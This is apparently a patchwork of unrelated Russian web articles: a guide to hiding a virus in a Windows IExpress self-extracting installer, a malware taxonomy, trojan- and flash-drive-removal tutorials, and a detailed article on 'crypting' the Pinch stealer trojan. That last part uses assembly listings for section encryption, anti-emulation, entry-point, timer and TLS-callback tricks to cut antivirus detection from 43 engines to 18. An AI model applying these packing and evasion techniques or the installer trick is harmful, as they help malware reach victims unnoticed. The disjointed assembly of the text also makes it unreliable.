Как спрятать вирус .
Всем привет, в этой статье я изложу основные действия, которые предпринимает хакер, для того, чтобы спрятать вирус . Первое, что напрашивается – это спрятать вирус в какую-то программу, чтобы тот запустился вместе с установочным файлом программы. Так сказать, под шумок. Пользователь ведь всё равно что-то устанавливает – авось и не заметит… Вот почему, кстати, крайне важно проверять все файлы без исключения, которые попадают на компьютер или ноутбук.
С помощью этой техники можно спрятать вирус , но обычно хакеры подсовывают в упаковку программы-шпионы, кейлоггеры, наблюдая за действиями клавиатуры, изображениями монитора и даже делая снимки с веб-камеры, которая, как вам кажется, в данный момент выключена.
Итак, задача взломщика — спрятать исполнительный файл вируса в другой исполнительный файл. Сделать это хакеру нужно незаметно от глаз пользователя. Так вот, спрятать вирус можно несколькими способами, для этого есть немало программ, но внутри Windows есть небольшая встроенная утилита, которая сама неплохо справляется с такой задачей. Причём не хуже платных аналогов. По опыту и немного забегая вперёд, скажу, что использование именно этого упаковщика даёт хакеру несколько неоспоримых преимуществ – утилита идёт с цифровой подписью Windows Genuine (понимающие о чём речь сейчас должны утвердительно кивнуть головой), а это очень важно при последующей распаковке файла. Да-да, та самая утилита IExpress. Она входит в сборку Windows с незапамятных времён и спроектирована для создания именно исполнительных файлов.
Для начала вызовем программу. Сочетание Win + R. Далее вводим команду iexpress 
Если файл только что создаётся, можно сразу нажать на кнопку Next, так как по умолчанию выполнится команда Создать новый самораспаковывающийся файл. В следующем окне, которое спросит, что должно произойти после распаковки, делаем тоже самое, нажав на кнопку Next (выполнится команда Распаковать файлы и запустить как установку)
Следующее окно попросит назвать распаковывающийся файл:
Если хакер хочет спрятать вирус , но отвлечь потенциального пользователя, он может написать в следующем окне надпись типа «В целях безопасности отключите антивирус и фаерволл!». Или что-то наподобие. Да, так он и сделает:
Следующее окно о лицензии можно пропустить (но иногда хакеры вставляют и довольно объёмные чужие тексты о соблюдении прав на программное обеспечение: выглядит убедительно, тем более это никто читать-то не будет). Но мы для наглядности пропустим.
Следующее окно – важное. Оно-то и предлагает вам Создать список файлов, которые будут запакованы в файл. Хакер, как и простой производитель программ, может подкинуть туда пару рисунков или фотографий, чтобы спрятать вирус понадёжнее, и чтобы тот основательно потерялся среди прочих файлов. Я это не буду делать для быстроты эксперимента и позже укажу только два файла.
Всё, что вам нужно сделать, это указать расположение файлов. Среди них и можно спрятать вирус (один из файлов я так и назвал):
Следующее окно уточнит, что в списке является основной командой, а что – так… придаток. Хакер укажет сначала на вирус:
В следующем окне система спросит, прятать ли процесс установки от пользователя или показывать так или иначе. А зачем прятать – антивирус-то отключён! Оставляем прямо так:
Ещё не всё. Следующее окно попросит указать фразу, следующую за окончанием установки, или оставить запуск программы как есть. Выберите сами и нажмите Next.
Далее выбирается путь установки вируса по умолчанию, который будет предложен нерадивому пользователю (я выбрал прямо Рабочий стол). Но хакер обязательно выставит галочку в первом пункте (в окне справа напротив Hide File Extracting…):
Следующее окно тоже оставьте по умолчанию (Перезагрузка по усмотрению). Снова кнопка Next (Далее).
Осталось совсем немного. Нажмите в появляющихся окнах последовательно кнопку Далее и сюрприз от хакера готов.
Нажмите кнопку Finish (Финиш).
Маленький недочёт: ярлык созданного файла будет иметь ярлык исполнительного файла от Microsoft. Его тоже можно будет сменить. Как сменить ярлык исполняемого файла можно прочитать в этой статье.
Теперь вы знаете многое. Не попадитесь на такую удочку.
- — персональный компьютер;
- — антивирусное программное обеспечение;
- — сканер-антивирус.
Компьютерные вирусы действуют так же, как и их биологические прототипы — они создают свои копии в системных файлах компьютера перед причинением явного вреда, позволяющего их обнаружить.
Единой официальной системы классификации компьютерных вирусов не существует, но тип воздействия и способы заражения позволяют разделить их на:
— сетевых червей (worm), занимающихся саморазмножением в памяти и на жестком диске зараженного компьютера. Никакой дополнительной вредоносной программы черви не имеют, но способны замедлять работу системы. Распространяются по сети;
— троянов (троянских коней, Trojans), являющихся одними из самых опасных разновидностей вирусов. Трояны представляют из себя программы, скрытые внутри безвредных приложений, запуск которых приводит к инициации действия вредоносного компонента — воровства, изменения или удаления конфиденциальной информации пользователя, разрушения системы компьютера и выполнения других несанкционированных владельцем действий;
— зомби (zombie), представляющих из себя приложения, позволяющие осуществлять удаленное управление зараженным компьютером при подключении к сети. Особую опасность представляет возможность создания сети зараженных зомби компьютеров для рассылки спама и распространения вирусов;
— шпионов (spyware), отслеживающих и предоставляющих злоумышленнику доступ к конфиденциальным данным пользователя и, в свою очередь, подразделяющихся на:
— фишинг (phishing), являющейся почтовой рассылкой, содержащей ссылку на копию реально существующего финансового учреждения, для получения личной информации пользователя;
— фарминг, осуществляющем переадресацию на фальшивую страницу при попытке входа на веб-ресурс;
— вредоносные приложения (malware), объединенные задачей уничтожения пользовательских файлов, изменения системного реестра и извлечения личной информации пользователя.
Особо стоит выделить мобильные вирусы, предназначенные для воровства и использования в корыстных целях конфиденциальных данных пользователя. Распространяются в сообщения СМС и ММС.
Здравствуйте Друзья! В этой статье поговорим о том как удалить троян из компьютера. Вы знаете, что если работать под операционной системой Windows да еще и без антивируса, то вероятность заражения резко возрастает. Что бы снизить риск необходимо пользоваться хотя бы бесплатными антивирусами и включить установку обновлений Windows чтобы работала утилита Microsoft Malicious Software Removal Tool. На данный момент вирусы производятся и распространяются с такой скоростью, что антивирусные компании за ними не успевают. Это одна из причин попадания вредоносного кода в ваш компьютер. Что бы снизить риск заражения троянскими программами и обезвредить компьютер, некоторые компании разрабатывают специальное программное обеспечение (в том числе и бесплатное) для этих целей. В этой статье мы рассмотрим некоторые из них и покажем как с их помощью можно вылечить ваш компьютер. В конце статьи есть видео в котором вы узнаете как разобраться с троянскими программами с помощью Spyware Terminator
Принцип действия у троянских программ подобный. В большинстве случаев они маскируются под полезную программу при запуске которой троян перехватывает управление компьютером и начинает записывать себя в автозагрузку и другие критические места. В большинстве случаев происходит блокирование диспетчера задач Windows и редактора реестра. В результате чего появляются сообщения типа Диспетчер задач отключен администратором и подобные.
Злоумышленники выкладывают троянские программы на общедоступных ресурсах сети интернет. Пользователь попавший на данных ресурс в основном через уязвимости в браузере заражается вирусом. Далее злоумышленник использует компьютер в своих целях. Это может быть вычисление паролей для доступа к какому-нибудь ресурсу или кража вашей ценной информации. Одной из разновидности троянских программ является знаменитый WindowsLocker (Winlocker), блокирующий рабочий стол пользователя своим баннером и требующий перечисления средств на определенный кошелек или отправку SMS на короткий номер. Как убрать этот баннер с рабочего стола вы можете прочитать тут.
Так же широко используется информация эротической направленности. Пользователю присылается сообщение (даже от друзей в их контакт листе) типа — вот здесь нашел такое?. Доверие к таким сообщением больше, так как они от своих знакомых и + человек заинтересовывается, переходит по ссылке. Там чуть эротики, пользователь вовлекается в процесс, игнорирует оповещения антивирусного ПО и получает трояна.
Как защитить свой компьютер от троянских программ. Во первых, это не работать под администратором, Во вторых использовать файловые менеджеры по типу TotalCommander-а где показываются скрытые файлы и расширения всех файлов. Отличной альтернативой может выступать FreeCommander. Из названия понятно, что программа бесплатная. Сам пользуюсь и вам рекомендую. И в третьих, используйте хотя бы бесплатный антивирус. Причем бесплатный не значит плохой. Есть отличные варианты — Comodo например.
Практически все троянские программы обнаруживаются штатными (установленными) антивирусами. Необходимо быть внимательным к оповещениям последних. Не исключены случаи, что вы поймали еще пока неизвестного трояна и он блокировал антивирусную программу. В таких случаях рекомендуется воспользоваться дополнительным софтом описанным ниже.
Отличная утилита, которая не раз выручала меня в неравной борьбе с троянами. Программа мощная, но имеет два небольших недостатка. Первый, она на английском языке, и второй — она платная. Несмотря на это, программа исправно работает в течении 30 дней. Этого вполне достаточно, что бы обезвредить трояна.
Программу можно скачать по адресу
На момент написания статьи установщик весит около 12 МБ. Скачиваете и устанавливаете. Установка проста все время нажимаете Далее. В нижеприведенном окне оставляете флажок Проверить обновления. Компьютер должен быть подключен к интернету.
В следующем окне нажимаете Update для обновления
Дожидаетесь окончания загрузки обновлений.
Все, Trojan Remover готов к работе.
Через главное меню Пуск запускаете программу. Появляется окошко в котором нажимаете Continue — Продолжить
Далее, для запуска сканирования компьютера нажимаете Scan
Произойдет сканирование компьютера на троянские программы. Данная процедура занимает максимум минуты 3.
Если Trojan Remover найдет какие-либо угрозы вам об этом оповестят и предложат с ним разобраться
Если программа ничего не найдет увидите окошко выше.
При загрузке компьютера программа будет проводить быструю проверку. При этой проверке сканируются наиболее важные разделы операционной системы
При лечении или удалении троянской программы может потребоваться перезагрузка.
Trojan Remover — отличное решение для дезинфекции вашего компьютера.
Плюсом этой программы в сравнении с описанной выше является ее свободное распространение.
Скачаем программу для удаления троянов с официального сайта
Нажимаем на красную кнопку — Download Free Edition
Запускаем скачанный файл. Можно выбрать Express Install, будет быстро, но вы не сможете ничего изменить в настройках установки. Поэтому лучше выбрать Custom Install (надпись ниже зеленой кнопки)
Установка проста. После вам предложат использовать профессиональную версию продукта. Нажимаете Decline и отказываетесь
Запускаем программу. Первое что нам необходимо сделать это выполнить обновление. Нажимаем Check for Updates
В появившемся окне ждете пока обновятся все компоненты. Затем нажимаете Close
Для запуска полного сканирования системы необходимо выбрать Complete Scan, установить флажок Enable Rescue Scan и нажать кнопку Scan your Computer…
Программа принимает следующий вид, где необходимо подтвердить свои намерения нажав на кнопку Start Complete Scan >
Полное сканирование на троянские программы проходит относительно долго (SSD диск на 64 ГБ за 12 минут). По окончанию процесса вы увидите результат. Нажимаете кнопку Continue
Смотрите результаты сканирования. По умолчанию все найденные элементы выделены флажками. Если вы не знаете что это за файлы — однозначно удаляйте. Осуществляется это нажатием на кнопку Remove Threats
Скорее всего после завершения процесса удаления троянских программ с вашего компьютера программа предложит перезагрузится. Нажимайте на кнопку Reboot Now
После перезагрузки ваш компьютер будет обезврежен окончательно.
Чем эта программа отличается от двух предыдущих, так это полной поддержкой великого и могучего русского языка. За что ставим ей сразу ставим +
Скачаем программу с официального сайта
Переходим на сайт и нажимаем загрузка бесплатной версии. Нас перебрасывают на страницу загрузчика, где необходимо нажать Download. Установщик имеет размер менее одного мегабайта.
Запускаем скачанный файл. Установка как обычно не составляем труда. Необходимо только отключить установку панели Web Security Guard снятием соответствующего флажка
После установки программа предложит вам получить лучшую защиту. Необходимо просто нажать ОК
Откроется основное окно программы Spyware Terminator. Для запуска процедуры лечения необходимо перейти на вкладку Сканирование и нажать Полное Сканирование
Признаться честно не ожидал найти каких либо подозрительных объектов после сканирования первыми двумя утилитами. Нажимаете кнопку Удалить
Скорее всего вас попросят закрыть все браузеры для удаления троянов. Закрываете и утилита производит окончательную очистку системы.
Закрываете программу и наслаждаетесь отменной работой вашего компьютера.
В статье, как удалить троян, мы с вами немножко больше узнали об этой гадости. Так как справедливо утверждение, — Врага нужно знать в лицо. Чем больше вы знаете о данном типе вирусов, тем сложнее заразить ваш компьютер. В заключении попробую привести важные моменты в защите от троянов и любого другого вредоносного кода
- Не открывайте подозрительные ссылки. Даже от друзей. Возможно злоумышленник получил доступ к аккаунту вашего друга. Спросите друга о присланной ссылке. Если он ничего не знает, удаляйте сообщение и скажите что бы друг поменял пароль от сервиса.
- Установите любую антивирусную программу (рекомендую Comodo Internet Security или Microsoft Security Essentials) и постоянно обновляйте антивирусные базы и саму программу. Не отказывайтесь от предлагаемых регулярных проверок программы.
- Внимательно относитесь к предупреждениям антивирусного ПО
- Используйте файловые менеджеры (FreeCommander) или включите отображение скрытых файлов и папок в проводнике Windows (как это сделать — тут).
- Включите отображение расширений всех файлов (включая зарегистрированных типов)
- Внимательно проверяйте USB флешки на предмет скрытых или системных файлов. Их там быть не должно.
Если почувствовали что система ведет себя не стабильно, проведите полную проверку вашего компьютера воспользовавшись утилитой Dr.Web Cureit или аналогом от Касперского или Microsoft. Незнакомые файлы рекомендуется проверять на вирусы с помощью онлайн-сервисов. Как это сделать можно прочитать тут. Так же можно проверить на вирусы онлайн весь компьютер. Как это сделать можно прочитать тут. Если ситуация запущена и компьютер не грузится, воспользуйтесь Kaspersky Rescue Disk или Windows Defender Offline.
Больше информации по борьбе с вирусами можно получить в разделе Удаление вирусов.
Видео в котором покажу как удалить троян с помощью Spyware Terminator
Благодарю, что поделились статьей в социальных сетях. Всего Вам Доброго!
Учимся криптовать: Профессиональные приемы обхода антивирусов
Странно осознавать, что многие люди, создающие трояны, вирусы или использующие готовые решения-генераторы, нередко обращаются к услугам создателей «приватных крипторов», нередко оказывающихся обычными поделками студентов, обладающих весьма посредственными знаниями в области вирусмейкинга, имеющих слабое представление о структуре PE-файлов. Такой продукт может стоить десятки или даже сотни долларов, но при этом не обеспечивать даже минимальной защиты от разнообразных механизмов обнаружения вредоносных программ. А ведь достаточно легко самостоятельно спрятать троян от назойливых антивирусов, даже таких известных, как NOD и Dr. Web. И совершенно бесплатно! Как? Читай ниже!
Перед тем, как приступить к работе, давай определимся с арсеналом инструментов. Во-первых, криптовать будем давным-давно известный всем антивирусам Pinch (я намерено выбрал именно этот троян для исследований, поскольку билдеры для его построения и описание его конфигурации легко найти в Сети). В статье я опущу моменты, связанные с генерацией тела программы и созданием веб-админки для проверки работоспособности пинча (все необходимое для экспериментов, в том числе и руководства, ты можешь найти в зашифрованном RAR-архиве на нашем DVD). Один из главных инструментов исследователя вирусов – виртуальная машина VMWare с установленной Windows XP (данное требование необязательно, однако очень желательно не экспериментировать с вредоносным ПО на собственной машине). Кроме прочего, нам понадобятся отладчик OllyDbg, редактор WinHex, утилита для работы с PE-файлами LordPE. Ну и, разумеется, virustotal.com для тестов. Да, там сидят аналитики, и пользоваться услугами этого сайта для создания «невидимого» вируса – сущее безумие, однако в наши планы не входит нарушение закона. Мы – исследователи, поэтому пусть высоколобые реверсеры копаются в нашем коде на здоровье и работают над улучшением собственных продуктов. Остальное – по вкусу и в зависимости от личных предпочтений. Итак, задраиваем люки и погружаемся в отладку. Будет интересно!
Сначала обратимся к тривиальным и давно известным нам методам сокрытия кода – шифровке секции по константе. В своих статьях я уже не раз обращался к подобному коду. Удивительно, но простой XOR машинных кодов, находящихся в секции кода, позволяет избавиться от внимания аж четверти антивирусных программ! Итак, откроем сгенерированный файл пинча (pinch.exe) в отладчике. Точка входа по умолчанию равна 13147810. По адресу 13147C26 начинается поле сплошных нулей, оставленное компилятором для выравнивания секции. Нам это на руку – здесь мы будем размещать наш код. Итак, взгляни на вид криптора:
13147C30 PUSHAD
13147C31 MOV ECX,6C2F
13147C36 MOV EDX,DWORD PTR DS:[ECX+13141000]
13147C3C XOR EDX,76
13147C3F MOV DWORD PTR DS:[ECX+13141000],EDX
13147C45 LOOPD SHORT pinch_pa.13147C36
13147C47 POPAD
13147C48 JMP SHORT pinch_pa.13147810
13147C4B XOR EAX,EAX; обнуляем регистр
13147C4D PUSH pinch_pa.13147C62; помещение адреса нового обработчика в стек
13147C52 PUSH DWORD PTR FS:[EAX]; помещение адреса старого обработчика в стек
13147C55 MOV DWORD PTR FS:[EAX],ESP; помещение в FS:[0] указателя на структуру
13147C58 CALL pinch_pa.13147C58; генерация исключения путем переполнения стека
13147C5D JMP pinch_pa.13145555; данная инструкция никогда не будет исполнена
13147C62 POP EAX; восстановление регистров
13147C63 POP EAX
13147C64 POP ESP
13147C65 JMP pinch_pa.13147810; переход к выполнению программы
Кратко описать функционал кода можно следующим образом: мы создаем новый обработчик исключений и размещаем его по адресу 13147C62. Эмуляторы кода, которые неспособны должным образом определить логику выполнения программы, полагают, что вслед за бесконечной рекурсией по адресу 13147C58 произойдет передача управления на следующую инструкцию (JMP pinch_pa.13145555), в результате чего направляют дальнейшее исследование логики выполнения кода по неверному пути. На самом же деле, стек переполняется, вызывается исключение, а программа благополучно продолжает свою работу. Действуя таким образом, мы отметаем еще четыре антивируса (только 27 из 43 утилит справились с задачей и распознали вредоносный код).
Итак, мы отправили на прогулку лесом едва ли не половину антивирусов – что же дальше? Теперь мы займемся более изощренными способами антиотладки и простейшей антиэмуляции.
Возможно, многим покажется, что описанного выше уже достаточно, чтобы успешно распространять троянские программы, ведь шансы быть обнаруженными мы сократили вдвое. Это верно, однако мы отсекли лишь самые убогие антивирусы, которые совершенно не отвечают требованиям времени. В ходе экспериментов я выяснил, что и с мощной эмуляцией кода можно справиться, причем достаточно легко!
Для разминки, вставим в подопытный пинч несколько небольших кусков кода, которые «закроют глаза» нескольким антивирусам (а заодно и многим реверсерам низкой квалификации). По адресу 13147C90 я разместил криптор, аналогичный вышеописанному, который шифрует написанный нами антиотладочный код (4Ch байт, начиная с адреса 13147C30). На диске ты найдешь его код, здесь же его привести не позволяет объем статьи. Таким образом, мы скрыли от некоторых эвристических механизмов некоторые детали нашего механизма, усложнив работу необходимостью многоступенчатой распаковки.
13147C90 — NEW OEP
length of code 4c
13147c30 — start of code
13147c7c -end of code
13147C90 60 PUSHAD
13147C91 B9 4C000000 MOV ECX,4C
13147C96 8B91 307C1413 MOV EDX,DWORD PTR DS:[ECX+13147C30]
13147C9C 83F2 54 XOR EDX,54
13147C9F 8991 307C1413 MOV DWORD PTR DS:[ECX+13147C30],EDX
13147CA5 ^E2 EF LOOPD SHORT kadabra_.13147C96
13147CA7 61 POPAD
jmp 13147c30
Существует очень любопытный прием, который дает очень хороший эффект, вводящий в ступор некоторые отладчики и антивирусы. Имя ему – обнуление точки входа. Действительно, совсем неправдоподобной выглядит ситуация, когда PE-заголовок, располагающийся по нулевому смещению относительно ImageBase, является одновременно исполняемым кодом. Однако она более чем возможна. Открой отлаживаемый файл в WinHex и взгляни на байты данных, располагающиеся в самом начале файла: 4D 5A 00 00 (да-да, это та самая буквенная сигнатура «MZ», расположенная в начале PE-файла!). Взглянув на этот же PE-заголовок в отладчике (для этого нужно перейти по адресу 13140000h), мы увидим следующую картину:
13140000 4D DEC EBP
13140001 5A POP EDX
13140002 0000 ADD BYTE PTR DS:[EAX],AL
13140004 0100 ADD DWORD PTR DS:[EAX],EAX
.
13140028 0000 ADD BYTE PTR DS:[EAX],AL
Кажется, первые две инструкции вполне безобидны и могут быть выполнены без риска «уронить» программу. К сожалению, следом за ними располагается лишь два нулевых байта, а испортить MZ-заголовок, записав межсегментный пятибайтный переход на антиотладочный код, мы не можем. Подумав с полминуты, можно найти верное решение. Взгляни на 13140028. Здесь можно найти гораздо больше пяти нулевых байт. Слон здесь вряд ли поместится, но длинный переход – вполне! Итак, действуем следующим образом: меняем нулевые байты, начиная с адреса 13140002, на следующую инструкцию:
13140002 EB 24 JMP SHORT 13140028
а байты, расположенные по адресу 13140028, на следующий код:
13140028 -E9 637C0000 JMP 13147c90
После выполненных процедур остается лишь сохранить программу, открыть ее на редактирование в LordPE и обнулить поле «EntryPoint». Итак, все работает, и еще два антивируса сдались: теперь лишь 25 из 43 находят в нашем подопытном образце опасный код.
Исследования показали, что пинч содержит четыре секции, две из которых – .conf и .data – содержат данные, которые могут быть рассмотрены антивирусами в качестве константы и занесены в сигнатурную базу. Поэтому необходимо зашифровать и их.
Для этого полностью убираем код раскриптовки, заменяя его в OllyDbg на нули, и видим, что наш образец все равно палится как пинч! Делаем вывод, что либо антивирусы методом перебора видят наш код, либо проверяют image base. Пробуем изменить Image base – и, действительно, отметаем еще четыре антивируса.
Представь ситуацию: мы располагаем тысячей программ, каждая из которых использует 15-секундный таймер. Суммарное время задержки выполнения кода составит, что несложно подсчитать, 15000 секунд, или около четырех часов. Таким образом, если антивирусный алгоритм в своей работе по-настоящему эмулирует таймер, анализ тысячи подобных файлов займет у него вышеуказанное время. Конечно, реальная эмуляция таймеров – нонсенс, и многие алгоритмы просто-напросто нужным образом изменяют регистры или стек контекста процесса, если встречают одну из API-функций, выполняющих задержку выполнения программы. Но все ли антивирусы настолько хороши? Проверим на практике.
Попробуем использовать таймер в своих целях, чтобы сравнять с землей эмуляцию кода. Итак, наш план – использовать два замера времени, в промежутке между которыми будет «тикать» таймер. Впоследствии мы используем два временных штампа, чтобы вычислить разность между ними. Разность эта в дальнейшем будет нами использоваться для того, чтобы изменить логику работы защитного механизма.
Для того, чтобы засечь время, используем API-функцию GetLocalTime, которая записывает по указанному в стеке адресу следующую 16-байтную структуру:
typedef struct _SYSTEMTIME <
WORD wYear; // Год
WORD wMonth; // Месяц
WORD wDayOfWeek; // День недели
WORD wDay; // День месяца
WORD wHour; // Часы
WORD wMinute; // Минуты
WORD wSecond; // Секунды
WORD wMilliseconds; // Миллисекунды
> SYSTEMTIME;
Условимся, что для хранения двух структур, полученных в результате пары вызовов GetLocalTime, будем использовать области памяти, начинающиеся, соответственно, с адресов 13147D7D и 13147D94. Функция Sleep(), входящая в Kernel32, инициирует «заморозку» выполнения программы, принимая параметр, выраженный в миллисекундах, через стек. Используя эти условия, напишем следующий код:
13147CFA PUSH kadabra_.13147D7D; записываем в стек первый адрес
13147CFF CALL kernel32.GetLocalTime; получаем первый временной штамп
13147D04 PUSH 3E8; задержка таймера – 1000 миллисекунд, или 1 секунда
13147D09 CALL kernel32.Sleep; запуск таймера
13147D0E PUSH kadabra_.13147D94; записываем в стек второй адрес
13147D13 CALL kernel32.GetLocalTime; получаем второй временной штамп
В результате выполнения получаем две 16-байтных заполненных структуры, каждая из которых записана, начиная с адреса, определенного нами выше:
[год][месяц][день недели][День месяца] [Часы] [Минуты] [Секунды][Миллисекунды]
13147D7D: DA 07 0A 00 02 00 0C 00 0D 00 0C 00 31 00 B1 03
13147D94: DA 07 0A 00 02 00 0C 00 0D 00 0D 00 04 00 B1 03
Обрати внимание: нас интересуют только значения, соответствующие секундам. Мы заставили программу «спать» ровно 1 секунду, а это значит, что разница между двойными словами, записанными в ячейках [13147d7d+С] и [13147D94+С], не должна быть больше или меньше единицы (в абсолютном большинстве случаев). Этот факт должен помочь нам побороть эмуляторы кода, пропускающие таймеры. Но как использовать полученное значение? Мы посчитаем разницу и используем ее для вычисления адреса перехода. Если эта разница будет посчитана неверно (что означает, что код эмулируется, причем неверно), то выполнение программы полетит ко всем чертям, но это нас не волнует :). Итак, получим приблизительно следующий код:
13147CF9 ;Код получения временных штампов (приведен выше)
13147D18 MOV AL,BYTE PTR DS:[13147D89]; первое значение помещаем в AL
13147D1D MOV AH,BYTE PTR DS:[13147DA0]; второе значение помещаем в AH
13147D23 SUB AH,AL; получаем разность значений
13147D25 XOR EBX,EBX; обнуляем EBX
13147D27 MOV BL,AH; перемещаем разность в EBX
13147D29 ADD EBX,13147C29; вычисляем адрес перехода
13147D2F JMP EBX; переходим по вычисленному адресу
Наверное, ты уже догадался, что адрес, который помещается в EBX, должен быть равен 13147C30. Однако, как показывает практика, не все идеально, особенно если речь идет об эмуляции кода. Благодаря несложным манипуляциям мы получаем великолепный результат: эмуляция Dr. Web разваливается на глазах! :). Вместе с ним отступают и еще два антивиря – это не может не радовать нашу душу. Всего 22 из 43 антивирусов продолжают подозревать нашу программу в чем-то нехорошем.
Когда я писал статью, я заметил, что в веб-интерфейс пинча стали приходить странные однообразные отчеты. Сначала мне показалось, что эти отчеты присланы с виртуальной машины, созданной мной, но потом понял, что это не так: все они были созданы на машинах с различной конфигурацией. В конце концов я понял, что это – результат запусков на машинах экспертов, которые пользуются virustotal’ом для анализа новых угроз. Мои опасения подтвердились, когда я увидел, что количество антивирусов, распознавших в зашифрованном мной файле угрозу, увеличилось, хотя и ненамного. Тогда я решил «обернуть» вокруг защиты, созданной мной, еще один «слой»-пакер, запускаемый из TLS. Для чего? Это позволит усложнить жизнь механизмам, использующим сигнатуры. Кроме того, на месте TLS-функции может быть любой алгоритм, кодирующий произвольный участок файла, что позволяет малыми усилиями полностью изменить содержание файла, скрыв «узнаваемые» места. Мало того, использование callback-функций само по себе является достаточно неплохим средством усложнения защитного механизма.
Думаю, что ты читал о TLS (Thread Local Storage)-callback-функциях достаточно (в частности, Крис посвятил TLS отдельную статью, опубликованную в одном из номеров нашего журнала), однако напомню о том, что они собой представляют, опуская описание широчайших возможностей их использования. Callback-функции выполняются непосредственно после инициализации программы загрузчиком, еще до остановки на OEP. Информация обо всех таких функциях содержится в специальной таблице, а адрес таблицы, в свою очередь, извлекается загрузчиком из специального поля PE-заголовка.
Попробуем создать таблицу TLS-функций для нашей программы (к написанию кода callback-функции приступим чуть позже). Структура ее, имеющая размер шестнадцати байт, проста. Первые два двойных слова используются для записи адресов начала и конца выделяемой для потока области данных. В качестве этих значений мы выберем два произвольных адреса (13147d80 и 13147d90), лежащих в пределах области выравнивания секции .text, оставленной компилятором. Оставшиеся два DWORD’а – это, соответственно, поле для записи индекса, возвращаемого callback-функцией (13147d96), и адрес таблицы callback-функций (13147da0).
Так выглядит код получившейся TLS-таблицы: 80 7d 14 13 90 7d 14 13 96 7d 14 13 a0 7d 14 13. Разместим его по адресу 13147d5d при помощи отладчика (запомним адрес – он нам еще понадобится).
Приступим к созданию кода таблицы TLS-функций.
Переходим к адресу 13147da0, выделяем 6 байт, выбираем из контекстного меню команду «Binary -> Edit». Вводим значение «13 14 7d b0 00 00». Первые 4 байта указывают на адрес callback-функции. Последние два нулевых байта указывают на окончание таблицы callback-функций.
По адресу 13147db0 разместим саму функцию, шифрующую все наши ранее созданные крипторы, а также код по второму кругу:
13147DB0 PUSHAD; сохраняем регистры в стек
13147DB1 MOV ECX,6D2F; устанавливаем счетчик
13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000];помещаем в DH текущий байт секции
13147DBC XOR DH,CL; выполняем логическое сложение с младшим байтом счетчика
13147DBE MOV BYTE PTR DS:[ECX+13141000],DH; помещаем закодированный байт в память
13147DC4 LOOPD SHORT 13147DB6; повторяем цикл
13147DC6 POPAD; восстанавливаем регистры
13147DC7 RETN; возвращаемся из функции
Полагаю, ты помнишь, что после внесения кода в файл необходимо выполнить его, чтобы он закодировал инструкции, после чего следует сохранить измененный файл прямо из-под OllyDbg.
Последний штрих – внесение сведений о TLS-директории в PE-заголовок. Открываем LordPE и правим в таблице директорий значение TLS Address на 00005d7d (разумеется, это же можно сделать и средствами OllyDbg). Кстати, если ты хочешь отлаживать TLS, чтобы не «пролетать» мимо выполнения callback-функций, нажми в OllyDbg Alt+O и в появившемся меню выбора места, где отладчик будет останавливаться при загрузке программы, укажи «System Breakpoint» (цель этого действия ясна, ведь TLS callback’и выполняются еще до попадания на точку входа!).
Проверим закодированный файл на virustotal.com. Нас ждет радостное известие – всего лишь 18 из 43 антивирусов распознают вредоносный код! Итак, на момент тестирования «сдались» такие маститые охотники за червями и малварью, как Dr.Web, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot, VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe и многие другие.
Я намерено не стал доводить нашу криптовку до победного конца. Придумывай новые методы обмана, внедряй в наш образец и таким образом обманывай новые антивирусы. Удачи в благих делах!
Как удалить вирус с флешки
Флешка — очень удобное устройство, но зачастую, она становиться источником распространения вирусов. Современные вирусы, стремятся заразить флешку, сразу после подключения к инфицированному компьютеру. После того, как вирус появляется на флешке, она становится опасной для других компьютеров. Степень опасности зависит от того, какой антивирус установлен на компьютере. Некоторые пользователи вообще не устанавливают на компьютеры и ноутбуки антивирусную защиту, тем самым подвергая свои данные и программы опасности.
Чтобы очистить флешку от вирусов, можно воспользоваться компьютером или ноутбуком (нетбуком) с надежным антивирусом. Под надежным антивирусом понимается платная версия антивирусной программы, например Kaspersky Internet Security (KIS) или Dr.Web Security Space. Если на компьютере установлена бесплатная версия антивируса, например AVAST Free Antivirus, то лучше не рисковать — при подключении зараженной флешки, может быть заражен компьютер.
В конкретном случае, будем удалять вирусы при помощи Kaspersky Internet Security 2013 с самыми свежими базами данных.
Подключаем флешку к компьютеру. KIS предложит проверить подключенный съемный диск. Выбираем вариант Полная проверка , при котором будут тщательно проверены все файлы на съемном диске.
Выбираем вариант «Полная проверка»
В первые же секунды проверки, антивирус обнаружил на флешке угрозу.
В процессе проверки обнаружена угроза
По окончании проверки Kaspersky Internet Security сам удалил вирус.
Антивирус Касперского автоматически удалил вирус с флешки
Согласно отчета, на флешке была троянская программа («троян») Trojan.Win32.Inject.
Антивирус обнаружил Trojan.Win32.Inject
В результате действия вируса, папки и файлы (кроме файла с расширением .exe), стали ярлыками.
Папки и файлы на флешке стали ярлыками
Вирус скрыл файлы и папки, а вместо них создал ярлыки с таким же названием. Если щелкнуть по такому ярлыку на зараженной флешке, то запуститься копия вируса. В конкретном случае, Касперский удалил вирус, поэтому при двойном клике по ярлыку, появляется сообщение, что не удалось найти исполняемый файл.
Файл вируса был удален, поэтому при двойном клике по ярлыкам ничего криминального не происходит
Ярлыки, которые заменили файлы и папки на флешке, можно удалить — они уже не нужны. Чтобы восстановить видимость файлов, можно воспользоваться файловым менеджером FAR Manager. О том, как это сделать, читайте в статье «Папки превратились в ярлыки. Решение проблемы». С большой степенью вероятности, восстановить отображения файлов можно при помощи лечащей утилиты, о которой будет рассказано при описании второго способа.
2 способ: удаление вирусов и ярлыков + восстановление файлов
Этот способ подойдет в том случае если:
- заражена не только флешка, но и компьютер, к которой ее планируется подключить для лечения от вирусов;
- на компьютере не установлен антивирус, либо антивирус установлен, но вы сомневаетесь в его надежности.
Шаг 1. Загрузите бесплатно лечащую утилиту Dr. Web CureIt с сайта разработчика. При необходимости, программу можно запускать со съемного носителя — установки на компьютер или ноутбук она не требует.
Шаг 2. Подключите флешку к компьютеру или ноутбуку и проведите полную проверку компьютера на вирусы. О том, как это сделать, читайте в статье «Бесплатная проверка компьютера на вирусы при помощи Dr.Web CureIt!».
Dr. Web CureIt удалит вирусы как c компьютера, так и с флешки. Более того, утилита удалит созданные вирусом на флешке ярлыки и попытается восстановить отображение скрытых троянцем файлов. В качестве эксперимента, запустим проверку только флешки (напомню, что вирус уже удален при помощи антивируса Касперского, но все файлы с флешки «исчезли», а вместо них появились ярлыки).
Запускаем выборочную проверку — выбираем только флешку
